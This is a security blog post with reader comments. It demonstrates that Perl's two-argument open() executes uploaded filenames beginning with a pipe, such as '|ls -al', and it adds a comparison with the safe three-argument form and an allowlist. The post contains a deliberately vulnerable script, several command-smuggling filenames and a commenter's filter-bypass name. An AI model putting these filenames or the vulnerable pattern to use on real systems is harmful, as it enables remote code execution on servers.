web application security lab

Code Execution Through Filenames in Uploads

I was up well before I should have been this morning and I was thinking more about file uploads. Remember back in the day when you inadvertently named a file with a dash or a slash in it? Oh, the joys of trying to clean up files on *Nix systems that had a slash in them. We learned our lesson and moved on with life. Now we are all grown up and have a different reason to create files with bad characters in their names: this time we want to exploit a file upload. So I wrote a short Perl script that simply looks for files in the current directory whose names match a pattern and opens each of them for reading:

#!/usr/bin/perl

# Open the current directory and keep every regular file whose name matches /ls/.
opendir(DIR, ".") || die "Can't open dir: $!\n";
@files = grep { /ls/ && -f "./$_" } readdir(DIR);
foreach $file (@files) {
  # Two-argument open: the mode is parsed out of the filename itself, so a name
  # beginning with "|" is run as a command and its output is read back.
  open (FILE, "$file") || die "Can't open $file: $!\n";
  print while (<FILE>);
  close FILE;
}
closedir DIR;

Here I show the contents of the file I named “|ls -al”, then list the directory, and finally run the script:

[haX0r]$ cat \|ls\ -al
This information is within the file |ls -al
[haX0r]$ ls -al
total 08
drwxr-xr-x 2 haX0r haX0r 512 Jun 19 15:43 .
drwxr-xr-x 37 haX0r haX0r 4096 Jun 18 12:59 ..
-rw-r--r-- 1 haX0r haX0r 247 Jun 19 15:46 test.pl
-rw-r--r-- 1 haX0r haX0r 0 Jun 19 15:43 |ls -al
[haX0r]$ perl test.pl
[haX0r]$ total 14
drwxr-xr-x 2 haX0r haX0r 512 Jun 19 15:43 .
drwxr-xr-x 37 haX0r haX0r 4096 Jun 18 12:59 ..
-rw-r--r-- 1 haX0r haX0r 247 Jun 19 15:46 test.pl
-rw-r--r-- 1 haX0r haX0r 0 Jun 19 15:43 |ls -al

Instead of opening the file, Perl treated the leading pipe in the filename as an instruction and ran `ls -al`: with the two-argument form of open() the filename decides the mode, and the -f check did nothing to stop it because the file really does exist. So herein lies another interesting place to use that arbitrary image name creation program I built (I guess it’s not just for XSS after all, but actual code execution on the host machine). Here would be an example. Encoding spaces might cause problems, but I’m sure we can work around that in most cases. Pretty trivial and pretty nasty.
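
The Perl behaviour behind this, as an added example that is not part of the original post: the vulnerable two-argument open() side by side with the three-argument form that fixes the mode, run against a constructed set of upload names in a throwaway directory. The file names, the temporary directory and the `safe_name` allowlist are assumptions made for this example, not anything the post specifies.

```perl
#!/usr/bin/perl
# Added example (not from the original post): Perl's two-argument open()
# lets an attacker-controlled filename pick the open mode, while the
# three-argument form pins the mode and treats the name as a plain path.
use strict;
use warnings;
use File::Temp qw(tempdir);

# Work in a throwaway directory so the hostile names cannot touch anything real.
my $dir = tempdir(CLEANUP => 1);
chdir $dir or die "chdir $dir: $!";

# Constructed "uploads": one honest name and three names that abuse 2-arg open().
my %uploads = (
    'report.txt'  => "harmless content\n",
    '|ls -al'     => "never seen by 2-arg open\n",   # leading pipe: run a command, read its output
    'echo pwned|' => "never seen by 2-arg open\n",   # trailing pipe: same thing
    '>report.txt' => "",                             # leading '>': 2-arg open would truncate report.txt
);
for my $name (keys %uploads) {
    open my $fh, '>', $name or die "create '$name': $!";   # 3-arg: the name is only a path
    print {$fh} $uploads{$name};
    close $fh;
}

# VULNERABLE: the mode is parsed out of the filename itself. Existence checks
# such as -f do not help; the file really exists, it just is not what gets opened.
sub read_2arg {
    my ($name) = @_;
    open(my $fh, $name) or return "open failed: $!";
    local $/;                       # slurp the whole handle
    my $data = <$fh>;
    close $fh;
    return defined $data ? $data : '';
}

# SAFE: the mode is fixed to '<', so '|', '>' and whitespace in $name are literal.
sub read_3arg {
    my ($name) = @_;
    open(my $fh, '<', $name) or return "open failed: $!";
    local $/;
    my $data = <$fh>;
    close $fh;
    return defined $data ? $data : '';
}

# Defence in depth for an upload handler: accept only names the application expects.
# This allowlist is an assumption for the example, not something the post specifies.
sub safe_name {
    my ($name) = @_;
    return $name =~ /\A[A-Za-z0-9_-]{1,64}\.(?:jpg|png|txt)\z/ ? $name : undef;
}

for my $name (sort keys %uploads) {
    my $content = read_3arg($name);
    chomp $content;
    printf "%-15s 3-arg read: %-28s allowlist: %s\n",
        "'$name'", "'$content'", defined safe_name($name) ? 'accepted' : 'rejected';
}

# The same names through the two-argument form: the "file" is executed, not read.
for my $name ('|ls -al', 'echo pwned|') {
    print "2-arg open on '$name' returned:\n", read_2arg($name), "\n";
}
```

Run it with `perl` on any *nix box. The three-argument reads return the literal file contents for every name, including “|ls -al”, while the two-argument reads return a directory listing and the string “pwned”, because the command embedded in the name was executed and its stdout read back. The allowlist rejects every hostile name before open() is reached, which is the check an upload handler should make regardless of which open() form it uses.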

13 Responses to “Code Execution Through Filenames in Uploads”

  1. Orwell, George Says:

    This is a well known ‘bug’. In fact, `perldoc -f open` has a warning about this. open(FILE, “

  2. Mrgat0x Says:

Hmm, it’s very interesting, but I don’t understand: when “[haX0r]$ cat \|ls\ -al” is run, is the executed query part of Perl?

    Regards,

  3. RSnake Says:

    @George - you need to encode < to be &lt; for it to show up. Yes it is well known that perl has that issue however I’ve never heard about it in quite this way, but I don’t think most people think about it - especially in this case.

    @Mrgat0x - I’m not sure I understand your question.

  4. Chris Shiflett Says:

    “@George - you need to encode < to be &lt;”

    Should you be doing that? :-)

  5. Orwell, George Says:

    Personally, I always use the 3 part form in all scripts, even one-liners. I’ve always thought this was common practice, but maybe not… I’m disgusted with anyone who doesn’t use it in real applications… Then again, I’m sure some people do…

    Cheers,
    Mr. Orwell

  6. Steve Says:

    Will that do the same in PHP?

  7. RSnake Says:

    @Chris - you can thank the legacy wordpress codebase for that, maybe I’ll add it to my long list of things I need to modify.

  8. yawnmoth Says:

    @Steve - why not test it out and find out for yourself?

  9. hackathology Says:

    interesting, interesting……..

  10. [fazed] Says:

    and if you need to call it a .jpg for the filters try something like:
    ls>a#.jpg
    then to read the output of the command:
    cat<a>

  11. [fazed] Says:

Huh, why has only half of what I said been shown?

  12. RSnake Says:

    You didn’t change < to &gt;

  13. Villager 14 Says:

    [fazed]: Mr. Orwell’s comments and RSnake’s reply weren’t enough for you to learn that < and > (}:-]) are special?